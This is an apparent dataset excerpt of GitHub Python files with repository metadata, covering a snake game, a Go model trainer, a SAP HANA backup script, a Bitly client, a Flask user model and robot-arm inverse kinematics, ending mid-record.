blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
06b5c58d9ad0cb17cf0ba76d39d551040997dd6d
|
e59b939d0cf51783fabf750034cc926cd1830ac7
|
/blender/nodes/output/__init__.py
|
db10ea1183e37c196fd7d1981634e73dc11d93cc
|
[
"MIT"
] |
permissive
|
taichi-dev/taichi_elements
|
cf96e66fd1207d5389709da0c6148e19c990db06
|
2451c9843a7058a1edcd10e448460f4ba509ecc4
|
refs/heads/master
| 2023-08-19T09:07:36.709483 | 2023-02-09T19:39:25 | 2023-02-09T19:39:25 | 231,448,642 | 400 | 71 |
MIT
| 2023-07-25T21:29:52 | 2020-01-02T19:46:31 |
Python
|
UTF-8
|
Python
| false | false | 20 |
py
|
from .mesh import *
|
[
"[email protected]"
] | |
289e97211637cfe7a0756c10320768fac5de8148
|
f72a0878225776c4c51d6201aeda705c99e197a4
|
/rna_transcription.py
|
bcfda4eba6b499420d1d3f1835135fcf076d0162
|
[] |
no_license
|
pnadolny13/exercism_python
|
f9dbb8ec0df809ef428a9c3141cc7a9539934698
|
26726fb8d1f732dae8b04e61bb6c99df00abbc2c
|
refs/heads/master
| 2021-01-19T20:50:35.160506 | 2017-09-21T16:07:46 | 2017-09-21T16:07:46 | 88,566,822 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 20 22:42:11 2017
@author: pnadolny
"""
def to_rna(dna):
    """Transcribe a DNA strand into its RNA complement.

    G -> C, C -> G, T -> A, A -> U. Input is case-insensitive.

    Args:
        dna: DNA strand as a string.

    Returns:
        The RNA complement, or '' if any character is not a valid
        nucleotide (matching the original all-or-nothing behavior).
    """
    # Table-driven mapping replaces the original if/elif chain.
    complement = {"G": "C", "C": "G", "T": "A", "A": "U"}
    rna = []
    for nucleotide in dna.upper():
        pair = complement.get(nucleotide)
        if pair is None:
            # Any invalid nucleotide invalidates the whole strand.
            return ""
        rna.append(pair)
    return "".join(rna)
|
[
"[email protected]"
] | |
833cbc14fd0605506b60d0d63c541f6e3bccb68b
|
6641090f2715a19503139f9c0c2440d2059a58b4
|
/main.py
|
6a045a75813d49a80f20bb02a64696fb6e5c8c05
|
[] |
no_license
|
JakobJBauer/snake-game
|
85e06c4b52b043c8e5d08adc10aee033da03dce9
|
ffac318a71a5088e9e41719db1a9206610235ad4
|
refs/heads/master
| 2021-05-27T10:32:30.594714 | 2020-04-11T06:42:29 | 2020-04-11T06:42:29 | 254,254,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,628 |
py
|
import pygame
import time
import random
from frame import Frame
from snake import Snake
from food import Food
# NOTE(review): indentation was reconstructed from a whitespace-flattened dump;
# the nesting below is the most plausible reading — confirm against the repo.
# region define constants
FRAME_WIDTH = 500      # playing-field width in pixels
FRAME_HEIGHT = 500     # playing-field height in pixels
COLOR = 'red3'         # pygame color name used for snake and food
FPS = 30               # base frame rate; effective tick speed scales with play time
PIXEL_SIZE = 10        # edge length of one snake/food cell in pixels
COMIC_SANS_MS_KEY = "Comic Sans MS"  # font name for all on-screen text
# endregion
pygame.init()
# Outer loop: one iteration per game "life"; setting start=True restarts after death.
start = True
while start:
    start = False
    frame = Frame(FRAME_WIDTH, FRAME_HEIGHT, "Snake - by Jakob J. Bauer")
    display = frame.get_display()
    # NOTE(review): snake uses .get(COLOR, fallback) while food indexes
    # THECOLORS[COLOR] directly — inconsistent lookup of the same key.
    snake = Snake(frame, pygame.color.THECOLORS.get(COLOR, (255, 0, 0)), PIXEL_SIZE)
    food = Food(PIXEL_SIZE, display, frame, pygame.color.THECOLORS[COLOR], snake)
    clock = pygame.time.Clock()
    loosing_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 30).render("You died!", False, (0, 255, 0))
    revive_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 30).render("To restart, press Space.", False, (0, 255, 0))
    food.get_eaten()
    run = True
    # Inner loop: one iteration per rendered frame.
    while run:
        if snake.direction == "hold":
            # Round timer keeps resetting while the snake waits for its first move.
            t0 = time.time()
        if not snake.is_dead():
            tn = time.time()
            time_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 16).render(f"Time: {round(tn - t0, 1)}", False, (0, 255, 0))
            score_text = pygame.font.SysFont(COMIC_SANS_MS_KEY, 16).render(f"Score: {snake.score}", False, (0, 255, 0))
            # Tick rate grows with elapsed time, gradually speeding the game up.
            clock.tick((FPS * ((tn - t0) * 0.01 + 0.8)) / 5)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
        keys = pygame.key.get_pressed()
        # Direction changes; reversing straight into yourself is disallowed.
        if keys[pygame.K_LEFT] and snake.direction != "right" and snake.direction != "hold":
            snake.set_direction("left")
        if keys[pygame.K_RIGHT] and snake.direction != "left":
            snake.set_direction("right")
        if keys[pygame.K_DOWN] and snake.direction != "up":
            snake.set_direction("down")
        if keys[pygame.K_UP] and snake.direction != "down":
            snake.set_direction("up")
        if keys[pygame.K_SPACE] and snake.is_dead():
            # Restart: exit the frame loop and re-enter the outer life loop.
            snake.revive()
            start = True
            run = False
        if snake.direction != "hold":
            frame.window.fill((0, 0, 0))
            snake.move()
            eaten = food.eating_process()
            if eaten:
                food.set_food_color((random.randint(0, 222), random.randint(0, 222), random.randint(0, 222)))
            snake.draw()
            food.redraw()
            display.blit(time_text, (440, 10))
            display.blit(score_text, (440, 26))
        if snake.is_dead():
            display.blit(loosing_text, (200, 200))
            display.blit(revive_text, (200, 300))
        pygame.display.update()
pygame.quit()
|
[
"[email protected]"
] | |
e9d996c78e8dc4c50310a0589b6b1b7b6d6ebe3e
|
d58ead50a17e0dc4fd8aa737c7ea02c6566b488a
|
/gostuff/chapter_7_sgf/test_model.py
|
10ca30cd0095069e116daa52de070cb9a5df6595
|
[] |
no_license
|
ThaddKara/GoStuff3
|
571ae5c71fcd812625659904381a76b8e28fd117
|
def71eba0e312b06fa9244994d9a8929c2c33a1a
|
refs/heads/master
| 2020-09-06T03:10:51.351595 | 2019-11-14T19:03:31 | 2019-11-14T19:03:31 | 220,299,930 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,752 |
py
|
from dlgo.data.parallel_processor import GoDataProcessor
from dlgo.encoders.oneplane import OnePlaneEncoder
from dlgo.networks import small
from keras.models import Sequential
from keras.layers.core import Dense
from keras.callbacks import ModelCheckpoint
if __name__ == '__main__':
    # Standard 19x19 Go board: one softmax class per board point.
    go_board_rows, go_board_cols = 19, 19
    num_classes = go_board_rows * go_board_cols
    num_games = 100
    # One-plane encoder: each position becomes a single feature plane.
    encoder = OnePlaneEncoder((go_board_rows, go_board_cols))
    processor = GoDataProcessor(encoder=encoder.name())
    # Generators stream encoded positions rather than loading all games in memory.
    generator = processor.load_go_data('train', num_games, use_generator=True)
    test_generator = processor.load_go_data('test', num_games, use_generator=True)
    # Channels-first input layout: (planes, rows, cols).
    input_shape = (encoder.num_planes, go_board_rows, go_board_cols)
    network_layers = small.layers(input_shape)
    model = Sequential()
    for layer in network_layers:
        model.add(layer)
    # Classification head over all 361 board points.
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='adagrad',
                  metrics=['accuracy'])
    epochs = 5
    batch_size = 128
    # NOTE(review): fit_generator/evaluate_generator are the legacy Keras API
    # (removed in TF2-era Keras); steps here are floats — modern Keras expects ints.
    model.fit_generator(
        generator=generator.generate(batch_size, num_classes),
        epochs=epochs,
        steps_per_epoch=(generator.get_num_samples() / batch_size),
        validation_data=test_generator.generate(batch_size, num_classes),
        validation_steps=test_generator.get_num_samples() / batch_size,
        callbacks=[ModelCheckpoint('../checkpoints/small_model_epoch_{epoch}.h5')])
    score = model.evaluate_generator(
        generator=test_generator.generate(batch_size, num_classes),
        steps=test_generator.get_num_samples() / batch_size)
    print('Test loss:', score[0])
    print('Test accuracy:', score[1])
|
[
"[email protected]"
] | |
61ff05ae1f2ff962b13358a66b366ac5c612e540
|
46355d9f1155bc7c0c2480a7c53fcb71e3347569
|
/data_norm.py
|
5c3742f459e029c09162241225c57701dfd55b7a
|
[] |
no_license
|
digitaltxtlab/filterbubble_fb
|
f28c2d7ba53668ba4452d595772d254443f0d4fd
|
44005f5639b2924de00e28d043f4017470f537f6
|
refs/heads/master
| 2021-06-16T06:27:15.065368 | 2017-05-23T16:27:09 | 2017-05-23T16:27:09 | 80,649,535 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,506 |
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
normalization of data from data_import
"""
__author__ = 'KLN'
import os, re
from unidecode import unidecode
from nltk.stem.snowball import SnowballStemmer
def normstatus(df, stem=1):
    """Danish-language normalization for status updates from data_import.get_status.

    For each row of df['content']: lowercase, optionally stem with the Danish
    Snowball stemmer, transliterate to ASCII (unidecode) and collapse runs of
    non-word characters to single spaces. Mutates the DataFrame in place.

    Args:
        df: pandas DataFrame with a string column 'content'; assumes a
            0..len-1 integer index (iterated via df.loc[i, ...]) — TODO confirm.
        stem: 1 (default) to apply stemming; any other value skips it.

    Returns:
        The same DataFrame, with 'content' normalized.
    """
    if stem == 1:
        stemmer = SnowballStemmer('danish', ignore_stopwords=True)
    # FIX: raw string — '\W' was an invalid escape sequence (SyntaxWarning on
    # modern CPython); r'\W+' matches runs of non-word characters as intended.
    pat = re.compile(r'\W+')
    for i in range(len(df)):
        s = df.loc[i, 'content']
        s = s.lower()
        if stem == 1:
            tokens = [stemmer.stem(token) for token in s.split()]
            s = ' '.join(tokens)
        s = unidecode(s)
        s = pat.sub(' ', s)
        df.loc[i, 'content'] = s
    return df
"""
## main
os.chdir(os.path.expanduser("~/Documents/proj/bechmann/filterbubble_fb"))
import data_import as di
filepath = os.path.expanduser('~/Documents/proj/bechmann/data/sample/')
df_list, ids = di.folder_import(filepath)
df_status = di.get_status(df_list, ids)
df_status_norm = normstatus(df_status)
df_photo = get_photo(df_list,ids)
# grap numeric id between fbid= and &set in: fbid=10202510181169383&set
import re
l = []
for i in range(len(df_photo)):
s = df_photo.loc[i,'image_id']
fbid = re.findall ('fbid=(.*?)\&set', s)# normal facebook (picture) id
if not fbid:
fbid = re.findall('www.facebook.com\/(.*?)\/photos',s) # alternate id
l.append(fbid)
#l
#s = df_photo.loc[5,'image_id']
#s
"""
|
[
"[email protected]"
] | |
616522b64c32d6f1f50b3960b866d5a6dac86f00
|
348f6801fdffb2a7706794d19f06738cf445e2ae
|
/Backup.py
|
6a97772fb21cf78773985c3ff0ce5b77f0ada3ce
|
[] |
no_license
|
darpan92/SAPHANABackupAutomation
|
c4c85bac690ae0ecdc0795bb0c5a1b0a6f6f0bd1
|
c15b64d744bb657cce84c757e5d99840bc90c7df
|
refs/heads/main
| 2023-05-05T06:06:50.286371 | 2021-05-24T14:59:08 | 2021-05-24T14:59:08 | 370,388,100 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,000 |
py
|
from hdbcli import dbapi
import sys
import shutil
import time
class Backup:
    """SAP HANA backup operations (size estimate, disk check, cancel, full backup)
    over hdbcli connections configured by a Config instance."""

    # Config object supplying the userstore key, backup partition path,
    # backup file location and file-name prefix.
    config = None

    def __init__(self, config_instance):
        self.config = config_instance

    def backup_size(self):
        """Return the estimated backup size (bytes) of the configured database."""
        conn = dbapi.connect(key=self.config.get_key())
        sql = "select sum(allocated_page_size) from M_CONVERTER_STATISTICS"
        cursor = conn.cursor()
        cursor.execute(sql)
        # Flatten the one-row/one-column result set.
        size = [item for x in cursor for item in x]
        y = ','.join(str(a) for a in size)
        # BUG FIX: the original printed the timestamp twice and never the size.
        print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup Size:", y)
        return int(y)

    def disk_size(self):
        """Return the free space (bytes) on the configured backup partition."""
        path = self.config.get_partition()
        usage = shutil.disk_usage(path)
        print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Disk Size:", usage.free)
        return usage.free

    def backup_check(self):
        """Return the BACKUP_IDs of backups currently running on the database."""
        conn = dbapi.connect(key=self.config.get_key())
        sql = "select BACKUP_ID from SYS.M_BACKUP_CATALOG where STATE_NAME = 'running';"
        cursor = conn.cursor()
        cursor.execute(sql)
        backup_ids = [item for x in cursor for item in x]
        print(time.strftime("%Y-%m-%d-%H:%M:%S"), "The following Backups were running:", backup_ids)
        return backup_ids

    def backup_cancel(self, backup_ids):
        """Cancel every backup id in `backup_ids` via BACKUP CANCEL.

        Returns the result of the last execute() call, or None if the list
        is empty.
        """
        # FIX: initialize so an empty id list no longer raises UnboundLocalError.
        backup = None
        for ids in backup_ids:
            conn = dbapi.connect(key=self.config.get_key())
            sql = "BACKUP CANCEL " + str(ids) + ";"
            cursor = conn.cursor()
            backup = cursor.execute(sql)
            print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup was cancelled")
        return backup

    def full_backup(self):
        """Run a full data backup; the file name is '<prefix>_<timestamp>'.

        Returns the execute() result (truthy on success).
        NOTE(review): connections opened here and in the other methods are
        never closed explicitly — relies on process exit / GC; confirm intent.
        """
        conn = dbapi.connect(key=self.config.get_key())
        sql = "BACKUP DATA USING FILE (" + "'" + str(self.config.get_backup_location()) + "'" + ", " + "\'" + self.config.get_backup_prefix() + "_" + time.strftime("%Y-%m-%d-%H:%M:%S") + "\'" + ")"
        time.sleep(3)
        cursor = conn.cursor()
        print(sql)
        backup = cursor.execute(sql)
        print(time.strftime("%Y-%m-%d-%H:%M:%S"), "Backup was completed Successfully")
        return backup
|
[
"[email protected]"
] | |
91858d79d83f7ba3165e67901f878bb4ebd5d2dd
|
a701db10bbdfe8f22b7a9d0672584f7af731e0ab
|
/url_shortener_service/clients/bitly_client.py
|
411cebe5aa2442531af2245ffd2f90e8908783e8
|
[] |
no_license
|
iamkhaya/url-shortener-service
|
b906d1d57b117735509b6e9ec18235cc99509393
|
d2d6512049905469277534be1b2259dd8b8fcbf2
|
refs/heads/master
| 2022-12-19T01:30:36.773708 | 2020-09-21T23:13:40 | 2020-09-21T23:13:40 | 297,461,166 | 2 | 0 | null | 2020-09-21T23:16:04 | 2020-09-21T21:05:41 |
Python
|
UTF-8
|
Python
| false | false | 2,346 |
py
|
import logging
from typing import List
import requests
from url_shortener_service.adapters.bitly_adapter import BitlyAdapter
from url_shortener_service.clients.abstract_client import AbstractClient
from url_shortener_service.dtos.short_url_dto import ShortUrlDto
from url_shortener_service.dtos.short_url_metric_dto import ShortUrlMetricDto
class BitlyClient(AbstractClient):
    """Client for the Bitly v4 REST API: URL shortening and click metrics."""

    def __init__(self):
        super().__init__()
        self.logger = logging.getLogger(__name__)
        # One shared session gives connection pooling across API calls.
        self.requests_session = requests.session()
        self.bitly_adapter = BitlyAdapter()

    def shorten_url(self, long_url: str) -> ShortUrlDto:
        """
        shorten a url using the bitly api
        Args:
            long_url: The long url to shorten
        Returns:
            short_url: A corresponding short url
        Raises:
            requests.HTTPError: if the Bitly API responds with an error status.
        """
        self.logger.info("shortening long url: %s", long_url)
        bitly_shortening_url: str = "https://api-ssl.bitly.com/v4/bitlinks"
        # self.headers / self.bitly_settings are presumably provided by
        # AbstractClient — confirm there.
        data: dict = {"long_url": long_url, "domain": self.bitly_settings["domain"]}
        # FIX: go through the session created in __init__ (the original used
        # bare requests.post, leaving the session unused and unpooled).
        response = self.requests_session.post(bitly_shortening_url, headers=self.headers, json=data)
        response.raise_for_status()
        converted_response: ShortUrlDto = self.bitly_adapter.convert_get_bitlink_response(response.json())
        self.logger.info("long url: %s, bitly response: %s", long_url, converted_response.__dict__)
        return converted_response

    def get_short_url_click_metrics(self, short_url: str) -> List[ShortUrlMetricDto]:
        """get click metrics for bitly defined short url
        Args:
            short_url: the url whose metrics is wanted
        Returns:
            link_clicks: a list of the clicks for the past 24 hours
        Raises:
            requests.HTTPError: if the Bitly API responds with an error status.
        """
        WINDOW_SIZE_IN_HOURS = 24  # probably want this to be part of the parameters
        params = (
            ("unit", "hour"),
            ("units", WINDOW_SIZE_IN_HOURS),
            ("size", "5"),
        )
        url = "https://api-ssl.bitly.com/v4/bitlinks/" + short_url + "/clicks"
        # FIX: same as shorten_url — use the shared session for the GET.
        response = self.requests_session.get(url=url, headers=self.headers, params=params)  # type: ignore
        response.raise_for_status()
        converted_response: List[ShortUrlMetricDto] = self.bitly_adapter.convert_get_bitlink_metrics_response(
            response.json()
        )
        return converted_response
|
[
"[email protected]"
] | |
937f68177d0fecd5743188bb0990ceb0772ad8fa
|
212522b02391cfe1d7873747c21d5fabdfd5e35d
|
/app/models.py
|
ae71f7a4207600f0c9df6622b4970770e9039702
|
[] |
no_license
|
graydenshand/flask_app_template
|
9e5460875461f25d544f5575cf91b3d0dc5fa29d
|
12c9db046fd12fd88c92dc5ff13c76906199c4a4
|
refs/heads/master
| 2022-12-12T00:14:29.862095 | 2018-07-11T20:15:26 | 2018-07-11T20:15:26 | 140,622,018 | 1 | 0 | null | 2022-09-16T17:48:03 | 2018-07-11T19:56:35 |
Python
|
UTF-8
|
Python
| false | false | 1,595 |
py
|
from datetime import datetime
from hashlib import md5
from time import time
from flask import current_app
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
from app import db, login
class User(UserMixin, db.Model):
    """Application user account with password hashing, Gravatar avatars and
    signed password-reset tokens."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(64), index=True, unique=True)
    email = db.Column(db.String(120), index=True, unique=True)
    password_hash = db.Column(db.String(128))

    def __repr__(self):
        return '<User {}>'.format(self.username)

    def set_password(self, password):
        """Store a salted hash of `password`; the plaintext is never kept."""
        self.password_hash = generate_password_hash(password)

    def check_password(self, password):
        """Return True if `password` matches the stored hash."""
        return check_password_hash(self.password_hash, password)

    def avatar(self, size):
        """Return a Gravatar URL for this user's email at `size` pixels."""
        digest = md5(self.email.lower().encode('utf-8')).hexdigest()
        return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
            digest, size)

    def get_reset_password_token(self, expires_in=600):
        """Return a signed JWT authorizing a password reset for `expires_in` seconds.

        NOTE(review): .decode('utf-8') assumes PyJWT < 2.0, where encode()
        returns bytes; PyJWT >= 2.0 returns str and this would raise — confirm
        the pinned dependency version.
        """
        return jwt.encode(
            {'reset_password': self.id, 'exp': time() + expires_in},
            current_app.config['SECRET_KEY'],
            algorithm='HS256').decode('utf-8')

    @staticmethod
    def verify_reset_password_token(token):
        """Return the User referenced by a valid reset token, else None."""
        try:
            id = jwt.decode(token, current_app.config['SECRET_KEY'],
                            algorithms=['HS256'])['reset_password']
        # FIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; any decode/lookup failure means "invalid token".
        except Exception:
            return
        return User.query.get(id)
@login.user_loader
def load_user(id):
    # Flask-Login callback: map the session-stored user id back to a User row.
    return User.query.get(int(id))
|
[
"[email protected]"
] | |
40e1fc945c26115dd87171bd13379d5ca5c0a6b4
|
cf5ea5fb21960be9d0dd8438a1f7712c7ec2ccdb
|
/Programming/Math/excelColumnNumber.py
|
0835bacd817ab4c91b94803df33604689fb3bfc1
|
[] |
no_license
|
anku255/Interviewbit
|
1010546199d626eddbdd30d6ba42d1c7e8a42d50
|
e42dfa10855b00934d39dcadce5fa527b4a96895
|
refs/heads/master
| 2020-06-28T20:27:44.774348 | 2019-09-20T17:17:01 | 2019-09-20T17:17:01 | 200,333,643 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
from __future__ import print_function
class Solution:
    """Convert an Excel-style column title ('A', 'B', ..., 'AA', ...) to its
    1-based column number (base-26 with digits A..Z)."""

    # returns 1 for A, 2 for B and so on
    def getSingleColNum(self, col):
        """Map a single uppercase letter to its 1..26 value."""
        return ord(col) - 64

    def titleToNumber(self, col):
        """Print and return the column number for title `col` (e.g. 'AB' -> 28).

        The return value is new (the original only printed) and is
        backward-compatible: existing callers that ignored the result still work.
        """
        columnNumber = 0
        # Rightmost letter is the least-significant base-26 digit.
        for position, char in enumerate(reversed(col)):
            columnNumber += 26**position * self.getSingleColNum(char)
        print(columnNumber)
        return columnNumber
s = Solution()
# BUG FIX: the original called s.findColumnNumber('AAA'), a method that does
# not exist on Solution (AttributeError at runtime); the method is titleToNumber.
s.titleToNumber('AAA')
|
[
"[email protected]"
] | |
749ebd1fc73831af5d53749d304aa4f0729f1cf8
|
0ca0fc2c2aad412d9e2936d5d01fb1abc1539ee4
|
/apps/cart/forms.py
|
bead7dbbce173bcc6584e87b86d1c9a91dad31e7
|
[
"MIT"
] |
permissive
|
yeboahd24/python202
|
1f399426a1f46d72da041ab3d138c582c695462d
|
35963db9a4ad5fcd567ce1e98c673f1a2ed2abef
|
refs/heads/master
| 2023-05-06T04:14:19.336839 | 2021-06-02T01:22:44 | 2021-06-02T01:22:44 | 309,841,303 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 430 |
py
|
from django import forms
class CheckoutForm(forms.Form):
    """Checkout form collecting the buyer's contact/shipping details plus the
    Stripe card token."""
    first_name = forms.CharField(max_length=255)
    last_name = forms.CharField(max_length=255)
    email = forms.EmailField(max_length=255)
    phone = forms.CharField(max_length=255)
    address = forms.CharField(max_length=255)
    zipcode = forms.CharField(max_length=255)
    place = forms.CharField(max_length=255)
    # Token produced client-side by Stripe.js; used server-side to charge the card.
    stripe_token = forms.CharField(max_length=255)
|
[
"[email protected]"
] | |
ba9216a59c2b13e1304cc23a6f7ab5f03cb1bc79
|
4738be75b3c4f8b98bbf8c2ab970a32ac0bdc2bf
|
/home/snobots/unified-ros-platform/src/events/src/iros2019/inverse_kinematics.py
|
080a6b4038ae6be26128f4e692a271487bd9e02a
|
[
"BSD-2-Clause"
] |
permissive
|
chris-mega/PianoPlayer
|
eaf75a2b067d08284fe8abf0f4f664fde93e75a5
|
555268fbc9220817afb26de728024a3223e89f1f
|
refs/heads/master
| 2022-03-27T04:55:20.300585 | 2019-12-08T05:03:27 | 2019-12-08T05:03:27 | 213,043,747 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,177 |
py
|
#!/usr/bin/env python
# Author: Christian Melendez
# Inverse Kinematics program for a ROBOTIS-OP3 robot
from enum import Enum
from time import sleep
import rosnode
import rospy
from std_msgs.msg import String
from control_modules.control_module import ControlModule
from iros_vision.msg import ObjectCoords
from keys import Keys
import roslib.packages as rospkg
import os
import json
import math
from sensor_msgs.msg import JointState
from robotis_controller_msgs.msg import SyncWriteItem
from robotis_controller_msgs.srv import SetModule
class InverseKinematics(object):
    """Inverse-kinematics helper for a ROBOTIS-OP3 humanoid.

    Tracks present joint positions from /robotis/present_joint_states and
    publishes direct-control joint targets. The IK itself (calc_sho_roll /
    equations) solves a two-link arm (upper arm + forearm) for the shoulder
    pitch/roll and elbow angles.
    """

    # Full OP3 joint set; zipped with a list of 20 zeros in __init__,
    # so its length must stay 20.
    joints = [
        'r_sho_pitch',
        'l_sho_pitch',
        'r_sho_roll',
        'l_sho_roll',
        'r_el',
        'l_el',
        'r_hip_yaw',
        'l_hip_yaw',
        'r_hip_roll',
        'l_hip_roll',
        'r_hip_pitch',
        'l_hip_pitch',
        'r_knee',
        'l_knee',
        'r_ank_pitch',
        'l_ank_pitch',
        'r_ank_roll',
        'l_ank_roll',
        'head_pan',
        'head_tilt'
    ]

    def __init__(self):
        # Publishers/subscriber/service client onto the ROBOTIS controller topics.
        self.sync_write_pub = rospy.Publisher(
            '/robotis/sync_write_item', SyncWriteItem, queue_size=0)
        self.dxl_torque_pub = rospy.Publisher(
            '/robotis/dxl_torque', String, queue_size=0)
        self.write_joint_pub = rospy.Publisher(
            'robotis/set_joint_states', JointState, queue_size=0)
        self.write_joint_pub2 = rospy.Publisher(
            'robotis/direct_control/set_joint_states', JointState, queue_size=0)
        self.read_joint_sub = rospy.Subscriber(
            '/robotis/present_joint_states', JointState, self.get_joint_states)
        self.set_joint_module_client = rospy.ServiceProxy(
            '/robotis/set_present_ctrl_modules', SetModule)
        vals = [0.0]*20
        # Arm segment lengths used by the IK equations.
        self.upper_arm = 89 # mm
        self.forearm = 157 # mm
        self.key_width = 20  # mm; presumably a piano-key width — confirm with caller
        self.joint_positions = dict(zip(InverseKinematics.joints, vals))
        # Becomes True once the direct-control module has been activated.
        self.active_control = False

    def get_joint_states(self, msg):
        """Subscriber callback: cache the latest header and joint positions."""
        # NOTE(review): self.header is first set here; publishing before the
        # first joint-state message arrives would raise AttributeError.
        self.header = msg.header
        for joint in range(len(msg.name)):
            name = msg.name[joint]
            position = msg.position[joint]
            self.joint_positions[name] = position

    def set_module(self, name):
        """Activate control module `name` once; no-op on subsequent calls."""
        if not self.active_control:
            set_module_srv = SetModule()
            set_module_srv.module_name = name
            if not self.set_joint_module_client.call(set_module_srv.module_name):
                rospy.logerr('Failed to set module')
            self.active_control = True

    def publish_joints(self):
        """Publish the full cached joint map as one direct-control JointState."""
        self.set_module('direct_control_module')
        msg = JointState()
        msg.header = self.header
        for joint in self.joint_positions:
            name = joint
            position = self.joint_positions[joint]
            msg.name.append(name)
            msg.position.append(position)
        self.write_joint_pub2.publish(msg)

    def publish_arms_only(self, arm):
        """Publish only the shoulder pitch/roll and elbow of one arm ('r' or 'l')."""
        self.set_module('direct_control_module')
        msg = JointState()
        msg.header = self.header
        joint = '{}_sho_pitch'.format(arm)
        msg.name.append(joint)
        msg.position.append(self.joint_positions[joint])
        joint = '{}_sho_roll'.format(arm)
        msg.name.append(joint)
        msg.position.append(self.joint_positions[joint])
        joint = '{}_el'.format(arm)
        msg.name.append(joint)
        msg.position.append(self.joint_positions[joint])
        self.write_joint_pub2.publish(msg)

    def move_r_shoulder(self):
        """Nudge the right shoulder pitch down ~1 degree; return the new angle (rad)."""
        self.joint_positions['r_sho_pitch'] -= 0.017 # move arm down by 1 degree
        self.publish_arms_only('r')
        # self.publish_joints()
        return self.joint_positions['r_sho_pitch']

    def move_r_shoulder_roll_right(self):
        """Nudge the right shoulder roll ~1 degree one way; return the new angle."""
        self.joint_positions['r_sho_roll'] += 0.017 # move arm down by 1 degree
        self.publish_arms_only('r')
        # self.publish_joints()
        return self.joint_positions['r_sho_roll']

    def move_r_shoulder_roll_left(self):
        """Nudge the right shoulder roll ~1 degree the other way; return the new angle."""
        self.joint_positions['r_sho_roll'] -= 0.017 # move arm down by 1 degree
        self.publish_arms_only('r')
        # self.publish_joints()
        return self.joint_positions['r_sho_roll']

    def move_arm(self, arm, values):
        """Set one arm's [sho_pitch, sho_roll, el] angles and publish them."""
        self.joint_positions['{}_sho_pitch'.format(arm)] = values[0]
        self.joint_positions['{}_sho_roll'.format(arm)] = values[1]
        self.joint_positions['{}_el'.format(arm)] = values[2]
        # self.publish_joints()
        self.publish_arms_only(arm)

    def move_joint_to(self, joint, angle):
        """Set a single joint to `angle` (rad) and publish the full joint map."""
        self.joint_positions[joint] = angle
        self.publish_joints()

    def get_arm_values(self):
        """Return ([l_sho_pitch, l_sho_roll, l_el], [r_sho_pitch, r_sho_roll, r_el])."""
        left = [self.joint_positions['l_sho_pitch'], self.joint_positions['l_sho_roll'], self.joint_positions['l_el']]
        right = [self.joint_positions['r_sho_pitch'], self.joint_positions['r_sho_roll'], self.joint_positions['r_el']]
        return left, right

    def calc_sho_roll(self, px, py):
        """Return the shoulder-roll angle (rad) for a target in the x/y plane."""
        d = (px/(px*px + py*py)**0.5)
        return math.asin(d)

    def equations(self, px, py, pz):
        """Solve the arm IK for wrist target (px, py, pz) in mm.

        Returns (sho_pitch, sho_roll, elbow) in radians, using the segment
        lengths set in __init__.
        NOTE(review): math.acos/asin raise ValueError for out-of-reach targets
        (argument outside [-1, 1]); callers must keep targets reachable.
        """
        a1 = self.upper_arm
        a2 = self.forearm
        # Law-of-cosines setup for the elbow angle.
        f1 = float(a2*a2 + a1*a1 - px*px - py*py - pz*pz)
        f2 = float(2*a2*a1)
        A = f1 / f2
        # print('f1',f1, 'f2',f2, 'A',A)
        # elbow = math.pi/2. - math.acos(A) # theta 6
        elbow = -math.acos(A) # theta 6
        # if elbow == -math.pi:
        # elbow = 0
        # elbow = 0
        # sho_roll = math.asin(py/(a1 + a2*math.cos(elbow))) # theta 4
        sho_roll = math.acos(py/(px*px + py*py + pz*pz)**0.5) # theta 4
        B = -a2*math.sin(elbow)
        C = -a1*math.cos(sho_roll) - a2*math.cos(sho_roll)*math.cos(elbow)
        # sho_pitch = 2*math.atan((C + (B*B + C*C - px*px)**0.5) / (B + px)) # theta 2
        sho_pitch = 0
        if px != 0:
            sho_pitch = math.atan(pz/px) - elbow # theta 2
        else:
            # Fallback branch; with px == 0 the divisor reduces to B.
            print('B C',B, C)
            sho_pitch = 2*math.atan((C + (B*B + C*C - px*px)**0.5) / (B + px)) # theta 2
        return sho_pitch, sho_roll, elbow
|
[
